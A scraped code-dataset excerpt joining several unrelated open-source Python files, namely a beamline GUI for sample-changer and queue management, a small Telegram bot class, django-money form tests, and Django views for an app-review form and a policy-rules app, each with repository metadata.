name = l_sample.get_name()
l_sample.init_from_sc_sample([new_location])
l_sample.set_name(name)
return barcode_samples, l_samples
def refresh_sample_list(self):
"""
Retrives sample information from ISPyB and populates the sample list
accordingly.
"""
log = logging.getLogger("user_level_log")
self.lims_samples = HWR.beamline.lims.get_samples(
HWR.beamline.session.proposal_id, HWR.beamline.session.session_id
)
basket_list = []
sample_list = []
self.filtered_lims_samples = []
sample_changer = None
self.sample_changer_widget.sample_combo.clear()
for sample in self.lims_samples:
try:
if sample.containerSampleChangerLocation:
self.filtered_lims_samples.append(sample)
item_text = "%s-%s" % (sample.proteinAcronym, sample.sampleName)
self.sample_changer_widget.sample_combo.addItem(item_text)
except BaseException:
pass
self.sample_changer_widget.sample_label.setEnabled(True)
self.sample_changer_widget.sample_combo.setEnabled(True)
self.sample_changer_widget.sample_combo.setCurrentIndex(-1)
if self.dc_tree_widget.sample_mount_method == 1:
sample_changer = HWR.beamline.sample_changer
elif self.dc_tree_widget.sample_mount_method == 2:
sample_changer = HWR.beamline.plate_manipulator
# if len(self.lims_samples) == 0:
# log.warning("No sample available in LIMS")
# self.mount_mode_combo_changed(self.sample_changer_widget.filter_cbox.currentIndex())
# return
if sample_changer is not None:
(barcode_samples, location_samples) = self.dc_tree_widget.samples_from_lims(
self.lims_samples
)
sc_basket_content, sc_sample_content = self.get_sc_content()
sc_basket_list, sc_sample_list = self.dc_tree_widget.samples_from_sc_content(
sc_basket_content, sc_sample_content
)
basket_list = sc_basket_list
# self.queue_sync_action.setEnabled(True)
for sc_sample in sc_sample_list:
# Get the sample in lims with the barcode
# sc_sample.code
lims_sample = barcode_samples.get(sc_sample.code)
# There was a sample with that barcode
if lims_sample:
if lims_sample.lims_location == sc_sample.location:
log.debug(
"Found sample in ISPyB for location %s"
% str(sc_sample.location)
)
sample_list.append(lims_sample)
else:
log.warning(
"The sample with the barcode (%s) exists" % sc_sample.code
+ " in LIMS but the location does not mat"
+ "ch. Sample changer location: %s, LIMS "
% sc_sample.location
+ "location %s" % lims_sample.lims_location
)
sample_list.append(sc_sample)
else: # No sample with that barcode, continue with location
lims_sample = location_samples.get(sc_sample.location)
if lims_sample:
if lims_sample.lims_code:
log.warning(
"The sample has a barcode in LIMS, but "
+ "the SC has no barcode information for "
+ "this sample. For location: %s"
% str(sc_sample.location)
)
sample_list.append(lims_sample)
else:
log.debug(
"Found sample in ISPyB for location %s"
% str(sc_sample.location)
)
sample_list.append(lims_sample)
else:
if lims_sample:
if lims_sample.lims_location is not None:
log.warning(
"No barcode was provided in ISPyB "
+ "which makes it impossible to verify if"
+ "the locations are correct, assuming "
+ "that the positions are correct."
)
sample_list.append(lims_sample)
else:
# log.warning("No sample in ISPyB for location %s" % \
# str(sc_sample.location))
sample_list.append(sc_sample)
self.dc_tree_widget.populate_tree_widget(
basket_list, sample_list, self.dc_tree_widget.sample_mount_method
)
self.dc_tree_widget.de_select_items()
def sample_combo_changed(self, index):
"""
Assigns lims sample to manually-mounted sample
"""
self.dc_tree_widget.filter_sample_list(0)
root_model = HWR.beamline.queue_model.get_model_root()
sample_model = root_model.get_children()[0]
sample_model.init_from_lims_object(self.filtered_lims_samples[index])
self.dc_tree_widget.sample_tree_widget.clear()
self.dc_tree_widget.populate_free_pin(sample_model)
def get_sc_content(self):
"""
Gets the 'raw' data from the sample changer.
:returns: A list with tuples, containing the sample information.
"""
sc_basket_content = []
sc_sample_content = []
for basket in HWR.beamline.sample_changer.get_basket_list():
basket_index = basket.get_index()
basket_name = basket.get_name()
sc_basket_content.append((basket_index + 1, basket, basket_name))
for sample in HWR.beamline.sample_changer.get_sample_list():
matrix = sample.get_id() or ""
basket_index = sample.get_container().get_index()
sample_index = sample.get_index()
sample_name = sample.get_name()
sc_sample_content.append(
(matrix, basket_index + 1, sample_index + 1, sample_name)
)
return sc_basket_content, sc_sample_content
def get_plate_content(self):
"""
"""
plate_row_content = []
plate_sample_content = []
for row in HWR.beamline.plate_manipulator.get_basket_list():
row_index = row.get_index()
row_name = row.get_name()
plate_row_content.append((row_index, row, row_name))
for sample in HWR.beamline.plate_manipulator.get_sample_list():
row_index = sample.get_cell().get_row_index()
sample_name = sample.get_name()
coords = sample.get_coords()
matrix = sample.get_id() or ""
plate_sample_content.append((matrix, coords[0], coords[1], sample_name))
return plate_row_content, plate_sample_content
def status_msg_changed(self, msg, color):
"""
Status message from the SampleChangerBrick.
:param msg: The message
:type msg: str
:returns: None
"""
logging.getLogger("GUI").info(msg)
def set_sample_pin_icon(self):
"""
Updates the location of the sample pin when the
matrix code information changes. The matrix code information
is updated, but not exclusively, when a sample is changed.
"""
self.dc_tree_widget.set_sample_pin_icon()
def sample_load_state_changed(self, state, *args):
"""
The state in the sample loading procedure changed.
Ie from Loading to mounted
:param state: str (Enumerable)
:returns: None
"""
s_color = SC_STATE_COLOR.get(state, "UNKNOWN")
Colors.set_widget_color(
self.sample_changer_widget.details_button, QtImport.QColor(s_color)
)
self.dc_tree_widget.scroll_to_item()
if HWR.beamline.diffractometer.in_plate_mode():
self.dc_tree_widget.plate_navigator_widget.refresh_plate_location()
def sample_selection_changed(self):
"""
Updates the selection of pucks. Method is called when the selection
of pucks in the dewar has been changed.
"""
self.dc_tree_widget.update_basket_selection()
def sample_changer_status_changed(self, state):
BaseWidget.set_status_info("sc", state)
def plate_info_changed(self):
self.set_sample_pin_icon()
self.dc_tree_widget.plate_navigator_widget.refresh_plate_location()
self.dc_tree_widget.scroll_to_item()
def show_sample_centring_tab(self):
self.sample_changer_widget.details_button.setText("Show SC-details")
self.hide_sample_centring_tab.emit(False)
def show_sample_tab(self, item):
self.sample_changer_widget.details_button.setText("Show SC-details")
self.hide_sample_tab.emit(False)
def show_dcg_tab(self, item):
self.sample_changer_widget.details_button.setText("Show SC-details")
self.hide_dcg_tab.emit(False)
self.populate_dc_group_tab(item)
def populate_dc_group_tab(self, item=None):
self.populate_dc_group_widget.emit(item)
def show_datacollection_tab(self, item):
self.sample_changer_widget.details_button.setText("Show SC-details")
self.hide_dc_parameters_tab.emit(False)
self.populate_dc_parameters_tab(item)
def populate_dc_parameters_tab(self, item=None):
self.populate_dc_parameter_widget.emit(item)
def show_char_parameters_tab(self, item):
self.sample_changer_widget.details_button.setText("Show SC-details")
self.hide_char_parameters_tab.emit(False)
def populate_char_parameters_tab(self, item):
self.populate_char_parameter_widget.emit(item)
def show_energy_scan_tab(self, item):
self.sample_changer_widget.details_button.setText("Show SC-details")
self.hide_energy_scan_tab.emit(False)
self.populate_energy_scan_tab(item)
def populate_energy_scan_tab(self, item):
self.populate_energy_scan_widget.emit(item)
def show_xrf_spectrum_tab(self, item):
self.sample_changer_widget.details_button.setText("Show SC-details")
self.hide_xrf_spectrum_tab.emit(False)
self.populate_xrf_spectrum_tab(item)
def populate_xrf_spectrum_tab(self, item):
self.populate_xrf_spectrum_widget.emit(item)
def show_advanced_tab(self, item):
self.sample_changer_widget.details_button.setText("Show SC-details")
self.hide_advanced_tab.emit(False)
self.populate_advanced_tab(item)
def populate_advanced_tab(self, item):
self.populate_advanced_widget.emit(item)
def show_workflow_tab_from_model(self):
self.show_workflow_tab(None)
def show_workflow_tab(self, item):
self.sample_changer_widget.details_button.setText("Show SC-details")
running = HWR.beamline.queue_manager.is_executing()
self.populate_workflow_tab(item, running=running)
def populate_workflow_tab(self, item, running=False):
self.populate_workflow_widget.emit((item, running))
def show_xray_imaging_tab(self, item):
self.sample_changer_widget.details_button.setText("Show SC-details")
self.hide_xray_imaging_tab.emit(False)
self.populate_xray_imaging_tab(item)
def populate_xray_imaging_tab(self, item):
self.populate_xray_imaging_widget.emit(item)
def mount_mode_combo_changed(self, index):
self.dc_tree_widget.filter_sample_list(index)
self.sample_changer_widget.details_button.setEnabled(index > 0)
self.sample_changer_widget.synch_ispyb_button.setEnabled(
index < 2 and self.is_logged_in
)
# self.sample_changer_widget.sample_label.setEnabled(False)
# self.sample_changer_widget.sample_combo.setEnabled(index == 0)
if index == 0:
self.hide_sample_changer_tab.emit(True)
self.hide_plate_manipulator_tab.emit(True)
def toggle_sample_changer_tab(self):
if self.current_view == self.sample_changer_widget:
self.current_view = None
if self.dc_tree_widget.sample_mount_method == 1:
self.hide_sample_changer_tab.emit(True)
self.sample_changer_widget.details_button.setText("Show SC-details")
else:
self.hide_plate_manipulator_tab.emit(True)
self.sample_changer_widget.details_button.setText("Show Plate-details")
self.dc_tree_widget.sample_tree_widget_selection()
else:
self.current_view = self.sample_changer_widget
self.hide_dc_parameters_tab.emit(True)
self.hide_dcg_tab.emit(True)
if self.dc_tree_widget.sample_mount_method == 1:
self.hide_sample_changer_tab.emit(False)
self.sample_changer_widget.details_button.setText("Hide SC-details")
else:
self.hide_plate_manipulator_tab.emit(False)
self.sample_changer_widget.details_button.setText("Hide Plate-details")
self.hide_sample_tab.emit(True)
def selection_changed_cb(self, items):
if len(items) == 1:
item = items[0]
if isinstance(item, queue_item.SampleQueueItem):
self.populate_sample_details.emit(item.get_model())
self.emit_set_sample(item)
self.emit_set_directory()
self.emit_set_prefix(item)
# self.populate_edna_parameter_widget(item)
elif isinstance(item, queue_item.DataCollectionQueueItem):
data_collection = item.get_model()
if data_collection.is_mesh():
self.populate_advanced_tab(item)
else:
self.populate_dc_parameters_tab(item)
elif isinstance(item, queue_item.CharacterisationQueueItem):
self.populate_char_parameters_tab(item)
elif isinstance(item, queue_item.EnergyScanQueueItem):
self.populate_energy_scan_tab(item)
elif isinstance(item, queue_item.XRFSpectrumQueueItem):
self.populate_xrf_spectrum_tab(item)
elif isinstance(item, queue_item.GenericWorkflowQueueItem):
self.populate_workflow_tab(item)
elif isinstance(item, queue_item.DataCollectionGroupQueueItem):
self.populate_dc_group_tab(item)
elif isinstance(item, queue_item.XrayCenteringQueueItem):
self.populate_advanced_tab(item)
elif isinstance(item, queue_item.XrayImagingQueueItem):
self.populate_xray_imaging_tab(item)
self.selection_changed.emit(items)
def emit_set_directory(self):
directory = str(HWR.beamline.session.get_base_image_directory())
self.set_directory.emit(directory)
def emit_set_prefix(self, item):
prefix = HWR.beamline.session.get_default_prefix(item.get_model())
self.set_prefix.emit(prefix)
def emit_set_sample(self, item):
self.set_sample.emit(item)
def get_selected_items(self):
items = self.dc_tree_widget.get_selected_items()
return items
def add_to_queue(self, task_list, parent_tree_item=None, set_on=True):
if not parent_tree_item:
parent_tree_item = self.dc_tree_widget.get_mounted_sample_item()
self.dc_tree_widget.add_to_queue(task_list, parent_tree_item, set_on)
def open_xmlrpc_dialog(self, dialog_dict):
QtImport.QMessageBox.information(
self,
"Message from beamline operator",
dialog_dict["msg"],
QtImport.QMessageBox.Ok,
)
def select_last_added_item(self):
self.dc_tree_widget.select_last_added_item()
def filter_combo_changed(self, filter_index):
"""Filters sample treewidget based on the selected filter criteria:
0 : No filter
1 : Star
2 : Sample name
3 : Protein name
4 : Basket index
5 : Executed
6 : Not executed
7 : OSC
8 : Helical
9 : Characterisation
10: Energy Scan
11: XRF spectrum
"""
self.sample_changer_widget.filter_ledit.setEnabled(filter_index in (2, 3, 4))
self.clear_filter()
if filter_index > 0:
item_iterator = QtImport.QTreeWidgetItemIterator(
self.dc_tree_widget.sample_tree_widget
)
item = item_iterator.value()
while item:
hide = False
item_model = item.get_model()
if filter_index == 1:
hide = not item.has_star()
elif filter_index == 5:
if isinstance(item, queue_item.DataCollectionQueueItem):
hide = not item_model.is_executed()
elif filter_index == 6:
if isinstance(item, queue_item.DataCollectionQueueItem):
hide = item_model.is_executed()
elif filter_index == 7:
if isinstance(item, queue_item.DataCollectionQueueItem):
hide = item_model.is_helical()
else:
hide = True
elif filter_index == 8:
if isinstance(item, queue_item.DataCollectionQueueItem):
hide = not item_model.is_helical()
else:
hide = True
elif filter_index == 9:
hide = not isinstance(item, queue_item.CharacterisationQueueItem)
elif filter_index == 10:
hide = not isinstance(item, queue_item.EnergyScanQueueItem)
elif filter_index == 11:
hide = not isinstance(item, queue_item.XRFSpectrumQueueItem)
# elif filter_index == 11:
# hide = not isinstance(item, queue_item.AdvancedQueueItem)
if type(item) not in (
queue_item.TaskQueueItem,
queue_item.SampleQueueItem,
queue_item.BasketQueueItem,
queue_item.DataCollectionGroupQueueItem,
):
item.set_hidden(hide)
item_iterator += 1
item = item_iterator.value()
self.dc_tree_widget.hide_empty_baskets()
def filter_text_changed(self, new_text):
item_iterator = QtImport.QTreeWidgetItemIterator(
self.dc_tree_widget.sample_tree_widget
)
item = item_iterator.value()
filter_index = self.sample_changer_widget.filter_combo.currentIndex()
while item:
hide = False
new_text = str(new_text)
if filter_index == 2:
if isinstance(item, queue_item.SampleQueueItem):
hide = not new_text in item.text(0)
elif filter_index == 3:
if isinstance(item, queue_item.SampleQueueItem):
hide = not new_text in item.get_model().crystals[0].protein_acronym
elif filter_index == 4:
if isinstance(item, queue_item.BasketQueueItem):
if new_text.isdigit():
# Display one basket
hide = int(new_text) != item.get_model().location[0]
else:
# Display several baskets. Separated with ","
enable_baskat_list = new_text.split(",")
if len(enable_baskat_list) > 1:
hide = (
item.get_model().location[0] not in enable_baskat_list
)
item.set_hidden(hide)
item_iterator += 1
item = item_iterator.value()
if filter_index != 3:
self.dc_tree_widget.hide_empty_baskets()
def clear_filter(self):
item_iterator = QtImport.QTreeWidgetItemIterator(
self.dc_tree_widget.sample_tree_widget
)
item = item_iterator.value()
while item:
item.set_hidden(False)
item_iterator += 1
item = item_iterator.value()
def diffractometer_phase_changed(self, phase):
if self.enable_collect_conditions.get("diffractometer") != (
phase != "BeamLocation"
):
self.enable_collect_conditions["diffractometer"] = phase != "BeamLocation"
if phase:
self.update_enable_collect()
def ppu_status_changed(self, in_error, status_msg):
if self.enable_collect_conditions.get("ppu") != (in_error != True):
self.enable_collect_conditions["ppu"] = in_error != True
self.update_enable_collect()
def shutter_state_changed(self, state, msg=None):
# NBNB TODO HACK.
# Necessary because shutter states can be both 'opened', 'OPEN'. (and more?)
# NBNB fixme
#is_open = bool(state and state.lower().startswith('open'))
is_open = bool(state and state.lower().startswith('open'))
if self.enable_collect_conditions.get("shutter") != is_open:
self.enable_collect_conditions["shutter"] = is_open
self.update_enable_collect()
def machine_current_changed(self, value, in_range):
return
if self.enable_collect_conditions.get("machine_current") != in_range:
self.enable_collect_conditions["machine_current"] = in_range
self.update_enable_collect()
def update_enable_collect(self):
if self.current_queue_entry is not None:
#Do not enable/disable collect button if queue is executing
return
# Do not allow to start xray imaging from BeamLocation and DataCollection phase
self.enable_collect_conditions["imaging"] = True
for item in self.get_selected_items():
if isinstance(
item, queue_item.XrayImagingQueueItem
) and HWR.beamline.diffractometer.get_current_phase() in (
"BeamLocation",
"DataCollection",
):
self.enable_collect_conditions["imaging"] = False
enable_collect = all(
item == True for item in self.enable_collect_conditions.values()
)
if enable_collect != self.dc_tree_widget.enable_collect_condition:
if enable_collect:
logging.getLogger("GUI").info("Data collection is enabled")
else:
msg = ""
logging.getLogger("GUI").warning("Data collect is disabled")
for key, value in self.enable_collect_conditions.items():
if value == False:
if key == "diffractometer":
logging.getLogger("GUI").warning(
" - Diffractometer is in beam location phase"
)
elif key == "shutter":
logging.getLogger("GUI").warning(
" - Safety shutter is closed "
+ "(Open the safety shutter to enable collections)"
)
elif key == "ppu":
logging.getLogger("GUI").error(" - PPU is in error state")
elif key == "machine_current":
logging.getLogger("GUI").error(
" - Machine current is to low "
+ "(Wait till the machine current reaches 90 mA)"
)
elif key == "imaging":
logging.getLogger("GUI").warning(
"To start an imaging collection "
+ "diffractometer has to be in SampleCentering or in Transfer phase"
)
self.dc_tree_widget.enable_collect_condition = enable_collect
self.dc_tree_widget.toggle_collect_button_enabled()
def save_queue(self):
"""Saves queue in the file"""
if self.redis_client_hwobj is not None:
self.redis_client_hwobj.save_queue()
# else:
# self.dc_tree_widget.save_queue()
def auto_save_queue(self):
"""Saves queue in the file"""
if self.queue_autosave_action is not None:
if (
self.queue_autosave_action.isChecked()
and self.dc_tree_widget.samples_initialized
):
if self.redis_client_hwobj is not None:
self.redis_client_hwobj.save_queue()
# else:
# self.dc_tree_widget.save_queue()
def load_queue(self):
"""Loads queue from file"""
loaded_model = None
if self.redis_client_hwobj is not None:
loaded_model = self.redis_client_hwobj.load_queue()
if loaded_model is not None:
self.dc_tree_widget.sample_tree_widget.clear()
model_map = {"free-pin": 0, "ispyb": 1, "plate": 2}
self.sample_changer_widget.filter_cbox.setCurrentIndex(
model_map[loaded_model]
)
self.mount_mode_combo_changed(model_map[loaded_model])
self.select_last_added_item()
self.dc_tree_widget.scroll_to_item(self.dc_tree_widget.last_added_item)
return loaded_model
def queue_autosave_clicked(self):
"""Enable/disable queue autosave"""
pass
def queue_undo_clicked(self):
"""If queue autosave is enabled then undo last change"""
self.dc_tree_widget.undo_queue()
def queue_redo_clicked(self):
"""If queue autosave is enable then redo last changed"""
self.dc_tree_widget.redo_queue()
def queue_sync_clicked(self):
"""Add diffraction plan from ISPyB to all samples"""
self.dc_tree_widget.sample_tree_widget.selectAll()
self.dc_tree_widget.sync_diffraction_plan()
def data_path_changed(self, conflict):
"""Data path changed event. Used in state machine"""
self.dc_tree_widget.item_parameters_changed()
self.set_condition_state("data_path_valid", not conflict)
def acq_parameters_changed(self, conflict):
"""Acq parameter changed event. Used in state machine"""
self.dc_tree_widget.item_parameters_changed()
self.set_condition_state("acq_parameters_valid", len(conflict) == 0)
def set_condition_state(self, condition_name, value):
"""Sets condition to defined state"""
if self.state_machine_hwobj is not None:
self.state_machine_hwobj.condition_changed(condition_name, value)
|
lgpl-3.0
| -3,314,555,617,902,337,000
| 41.44164
| 100
| 0.579697
| false
| 4.01522
| false
| false
| false
|
mhspradlin/go-lite-bot
|
bot.py
|
1
|
1582
|
# Simply the class definitions for the bot and worker declarations
# Nice way to make HTTP get requests
import requests
# A nice holder for information we need between function calls
class Bot:
double_resets = {}
def __init__ (self, token):
self.token = token
handlers = {}
# Adds a single event handler
def addHandler (self, text, func):
handlers[text] = func
# Sends a text message to the specified chat_id
def sendMessage (self, chat_id = None, text = None):
if (chat_id != None and text != None):
r = requests.post('https://api.telegram.org/bot' + self.token +
'/sendMessage' +
'?chat_id=' + str(chat_id) +
'&text=' + text)
while r.status_code != requests.codes.ok:
r = requests.post('https://api.telegram.org/bot' + self.token +
'/sendMessage' +
'?chat_id=' + str(chat_id) +
'&text=' + text)
# Sends as photo using multipart-formdata
# Note that photo is a file-like object (like a StringIO object)
def sendImage (self, chat_id = None, photo = None):
if (chat_id != None and photo != None):
data = { 'chat_id' : str(chat_id) }
files = { 'photo' : ('board-image.png', photo) }
requests.post('https://api.telegram.org/bot' + self.token +
'/sendPhoto', data = data, files = files)
|
mit
| 952,455,742,594,944,600
| 38.575
| 79
| 0.513274
| false
| 4.152231
| false
| false
| false
|
AlexRiina/django-money
|
tests/test_form.py
|
1
|
2341
|
# -*- coding: utf-8 -*-
"""
Created on May 7, 2011
@author: jake
"""
from decimal import Decimal
import moneyed
import pytest
from moneyed import Money
from .testapp.forms import (
MoneyForm,
MoneyFormMultipleCurrencies,
MoneyModelForm,
OptionalMoneyForm,
)
from .testapp.models import ModelWithVanillaMoneyField
pytestmark = pytest.mark.django_db
def test_save():
money = Money(Decimal('10'), moneyed.SEK)
form = MoneyModelForm({'money_0': money.amount, 'money_1': money.currency})
assert form.is_valid()
instance = form.save()
retrieved = ModelWithVanillaMoneyField.objects.get(pk=instance.pk)
assert money == retrieved.money
def test_validate():
money = Money(Decimal('10'), moneyed.SEK)
form = MoneyForm({'money_0': money.amount, 'money_1': money.currency})
assert form.is_valid()
result = form.cleaned_data['money']
assert result == money
@pytest.mark.parametrize(
'data',
(
{'money_0': 'xyz*|\\', 'money_1': moneyed.SEK},
{'money_0': 10000, 'money_1': moneyed.SEK},
{'money_0': 1, 'money_1': moneyed.SEK},
{'money_0': 10, 'money_1': moneyed.EUR}
)
)
def test_form_is_invalid(data):
assert not MoneyForm(data).is_valid()
@pytest.mark.parametrize(
'data, result',
(
({'money_0': '', 'money_1': moneyed.SEK}, []),
({'money_0': '1.23', 'money_1': moneyed.SEK}, ['money']),
)
)
def test_changed_data(data, result):
assert MoneyForm(data).changed_data == result
def test_change_currency_not_amount():
"""
If the amount is the same, but the currency changes, then we
should consider this to be a change.
"""
form = MoneyFormMultipleCurrencies(
{'money_0': Decimal(10), 'money_1': moneyed.EUR},
initial={'money': Money(Decimal(10), moneyed.SEK)}
)
assert form.changed_data == ['money']
@pytest.mark.parametrize(
'data, result',
(
({'money_1': moneyed.SEK}, True),
({'money_0': '', 'money_1': moneyed.SEK}, True),
({'money_0': 'xyz*|\\', 'money_1': moneyed.SEK}, False),
)
)
def test_optional_money_form(data, result):
"""
The currency widget means that 'money_1' will always be filled
in, but 'money_0' could be absent/empty.
"""
assert OptionalMoneyForm(data).is_valid() is result
|
bsd-3-clause
| -7,676,951,155,857,008,000
| 23.642105
| 79
| 0.620248
| false
| 3.121333
| true
| false
| false
|
uw-it-aca/mdot-developers
|
mdotdevs/views.py
|
1
|
3614
|
from django.conf import settings
from django.template.loader import get_template
from django.template import RequestContext, Context
from django.shortcuts import render_to_response, render
from django.core.mail import send_mail, BadHeaderError
from django.http import HttpResponse, HttpResponseRedirect
import urllib
import json
from forms import ReviewForm
def home(request):
return render_to_response(
'mdotdevs/home.html',
context_instance=RequestContext(request))
def guidelines(request):
return render_to_response(
'mdotdevs/guidelines.html',
context_instance=RequestContext(request))
def process(request):
return render_to_response(
'mdotdevs/process.html',
context_instance=RequestContext(request))
def review(request):
# if this is a POST request we need to process the form data
if request.method == 'POST':
# create a form instance and populate it with data from the request:
form = ReviewForm(request.POST)
# check whether it's valid:
if form.is_valid():
campus_audience = form.cleaned_data['campus_audience']
campus_need = form.cleaned_data['campus_need']
sponsor_name = form.cleaned_data['sponsor_name']
sponsor_netid = form.cleaned_data['sponsor_netid']
sponsor_email = form.cleaned_data['sponsor_email']
dev_name = form.cleaned_data['dev_name']
dev_email = form.cleaned_data['dev_email']
support_name = form.cleaned_data['support_name']
support_email = form.cleaned_data['support_email']
support_contact = form.cleaned_data['support_contact']
ats_review = form.cleaned_data['ats_review']
ux_review = form.cleaned_data['ux_review']
brand_review = form.cleaned_data['brand_review']
app_documentation = form.cleaned_data['app_documentation']
app_code = form.cleaned_data['app_code']
anything_else = form.cleaned_data['anything_else']
email_context = Context({
'campus_audience': campus_audience,
'campus_need': campus_need,
'sponsor_name': sponsor_name,
'sponsor_netid': sponsor_netid,
'sponsor_email': sponsor_email,
'dev_name': dev_name,
'dev_email': dev_email,
'support_name': support_name,
'support_email': support_email,
'support_contact': support_contact,
'ats_review': ats_review,
'ux_review': ux_review,
'brand_review': brand_review,
'app_documentation': app_documentation,
'app_code': app_code,
'anything_else': anything_else
})
try:
send_mail(
sponsor_name,
get_template(
'mdotdevs/email_plain.html').render(email_context),
sponsor_email, ['jcivjan@uw.edu'],
html_message=get_template('mdotdevs/email_html.html')
.render(email_context),
),
except BadHeaderError:
return HttpResponse('Invalid header found.')
return render_to_response(
'mdotdevs/thanks.html',
context_instance=RequestContext(request))
# if a GET (or any other method) we'll create a blank form
else:
form = ReviewForm()
return render(request, 'mdotdevs/review.html', {'form': form})
|
apache-2.0
| -5,927,210,176,114,259,000
| 38.714286
| 76
| 0.589651
| false
| 4.17321
| false
| false
| false
|
yayoiukai/signalserver
|
policies/views.py
|
1
|
11360
|
import os
import datetime
from django.shortcuts import render
from django.http import HttpResponse
from django.template import loader
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from django.utils.encoding import smart_str
from xml.dom import minidom
from xml.etree.ElementTree import Element, SubElement, Comment
import xml.etree.ElementTree as ET
from .models import Policy, Operation, PolicyFile
from fileuploads.constants import POLICY_FILEPATH
from groups.models import Result, Row, Process
from .forms import PolicyNameForm
from .forms import PolicyForm
from .forms import PolicyFileForm
from .forms import OperationForm
def replace_letters(policy_name):
if " " in policy_name:
policy_name = policy_name.replace(' ', '_')
if "-" in policy_name:
policy_name = policy_name.replace('-', '_')
return policy_name
def get_dashboard_value(request, keyword='dashboard'):
if not keyword in request.POST:
dashboard = False
else:
dashboard = True
return dashboard
@login_required(login_url="/login/")
def index(request):
if request.method == 'POST':
policy_name = request.POST['policy_name']
policy_name = replace_letters(policy_name)
description = request.POST['description']
dashboard = get_dashboard_value(request)
display_order = request.POST['display_order']
count = Policy.objects.filter(
policy_name=policy_name).count()
if count > 0:
message = "policy name : " + policy_name + " is already taken. \
Please choose different name. Policy name needs to be unique."
return render_index(request, message)
else:
new_policy = Policy(
policy_name=policy_name,
display_order=display_order,
description=description,
dashboard=dashboard
)
new_policy.save()
return render_index(request, None)
def render_index(request, message):
form = PolicyForm() # A empty, unbound form
file_form = PolicyFileForm()
# Load documents for the list page
policies = Policy.objects.all().order_by('display_order')
new_display_order = policies.count() + 1
# Render list page with the documents and the form
return render(request, 'policies/index.html',
{'policies': policies, 'form': form, 'file_form': file_form,
'message': message, 'new_display_order': new_display_order})
def delete_policy(request, policy_id):
Policy.objects.get(id=policy_id).delete()
return HttpResponseRedirect(reverse('policies:index'))
def create_policy_xml(policy, file_name):
root = ET.Element("policy", name=policy.policy_name)
description = ET.SubElement(root, "description")
description.text = policy.description
operations = Operation.objects.filter(policy=policy)
for op in operations:
ET.SubElement(root, "rule", id=str(op.display_order),
filter_01=op.signal_name,
filter_02=op.second_signal_name, operation=op.op_name,
cutoff_number=str(op.cut_off_number),
dashboard=str(op.dashboard),
group_percentage=str(op.percentage),
file_percentage=str(op.file_percentage)
).text = op.description
xmlstr = minidom.parseString(ET.tostring(root)).toprettyxml(indent=" ")
with open(file_name, "w") as f:
f.write(xmlstr)
def get_or_create_policy_file(policy):
original_file_name = policy.policy_name + ".xml"
file_name = os.path.join(POLICY_FILEPATH, original_file_name)
if os.path.exists(file_name):
try:
os.remove(file_name)
except OSError as e:
#errno.ENOENT = no such file or directory
if e.errno != errno.ENOENT:
raise # re-raise exception if a different error occured
create_policy_xml(policy, file_name)
return file_name
def download_policy(request, policy_id):
policy = Policy.objects.get(id=policy_id)
file_name = policy.policy_name
file_path = get_or_create_policy_file(policy)
file_itself = open(file_path, 'rb')
response = HttpResponse(file_itself,
content_type='application/force-download')
response['X-Sendfile'] = file_path
response['Content-Length'] = os.stat(file_path).st_size
response['Content-Disposition'] = 'attachment; \
filename={}.xml'.format(smart_str(file_name))
return response
def create_policy_from_file(file_name):
new_file_name = os.path.join(POLICY_FILEPATH, file_name)
tree = ET.parse(new_file_name)
root = tree.getroot()
policy_name = root.attrib['name']
if Policy.objects.filter(policy_name=policy_name).count() > 0:
d = datetime.datetime.now()
policy_name = policy_name + '_uploaded_on_' + \
d.strftime("%Y_%m_%d_%H:%M")
desc = root.findall('description')[0].text
new_policy = Policy(
policy_name=policy_name,
description=desc
)
new_policy.save()
for child in root:
if child.tag == 'description':
continue
rule = child.attrib
desc = rule.get('description')
if desc is None:
desc = "No description"
new_operation = Operation(
policy=new_policy,
cut_off_number=rule.get('cutoff_number'),
signal_name=rule.get('filter_01'),
second_signal_name=rule.get('filter_02'),
op_name=rule.get('operation'),
description=desc,
percentage=rule.get('group_percentage'),
file_percentage=rule.get('file_percentage'),
dashboard=rule.get('dashboard')
)
new_operation.save()
@login_required(login_url="/login/")
def upload(request):
# Handle policy file upload
user_name = request.user.username
message = None
if request.method == 'POST':
form = PolicyFileForm(request.POST, request.FILES)
policy_file = request.FILES.get('policyfile')
if form.is_valid():
original_name = policy_file.name
extension = original_name[-4:]
if extension != ".xml":
message = "File format needs to be .xml. Your file is "
message = message + original_name + "\n"
else:
new_policy_file = PolicyFile(
policy_file=policy_file,
file_name=original_name,
)
new_policy_file.save()
create_policy_from_file(original_name)
else:
message = "something wrong with form"
return HttpResponseRedirect(reverse('policies:index'))
def delete_rule(request, op_id, policy_id):
Operation.objects.get(id=op_id).delete()
return HttpResponseRedirect(reverse('policies:show',
kwargs={'policy_id': policy_id}))
def edit_rule(policy, op_name, cutoff_num, sig_name, sig2_name,
display_order, description, percentage,
file_percentage, dashboard, id_num):
operation = Operation.objects.get(id=id_num)
operation.policy = policy
operation.cut_off_number = cutoff_num
operation.signal_name = sig_name
operation.second_signal_name = sig2_name
operation.op_name = op_name
operation.description = description
operation.percentage = percentage
operation.file_percentage = file_percentage
operation.dashboard = dashboard
operation.save()
def add_rule(policy, op_name, cutoff_num, sig_name, sig2_name,
display_order, description, percentage,
file_percentage, dashboard):
new_operation = Operation(
policy=policy,
cut_off_number=cutoff_num,
signal_name=sig_name,
second_signal_name=sig2_name,
op_name=op_name,
display_order=display_order,
description=description,
percentage=percentage,
file_percentage=file_percentage,
dashboard=dashboard
)
new_operation.save()
def update_policy(request, policy):
keyword = 'policy_dashboard'
dashboard = get_dashboard_value(request, keyword)
version = request.POST['version']
policy.dashboard = dashboard
policy.version = version
policy.save()
return policy
@login_required(login_url="/login/")
def show(request, policy_id):
policy = Policy.objects.get(id=policy_id)
if request.method == 'POST':
form = OperationForm(request.POST)
action = request.POST['action']
if action == "update_policy":
policy = update_policy(request, policy)
else:
dashboard = get_dashboard_value(request)
cutoff_num = request.POST.get('cutoff_number', 0)
sig_name = request.POST['signal_fields']
sig2_name = request.POST['second_signal_fields']
op_name = request.POST['operation_fields']
display_order = request.POST['display_order']
description = request.POST['description']
percentage = request.POST['percentage']
file_percentage = request.POST['file_percentage']
if action == 'new':
add_rule(policy, op_name, cutoff_num, sig_name, sig2_name,
display_order, description, percentage,
file_percentage, dashboard)
else:
id_num = request.POST['id_num']
edit_rule(policy, op_name, cutoff_num, sig_name, sig2_name,
display_order, description, percentage,
file_percentage, dashboard,
id_num)
policy.user_name = request.user.username
policy.save()
operation = Operation.objects.filter(
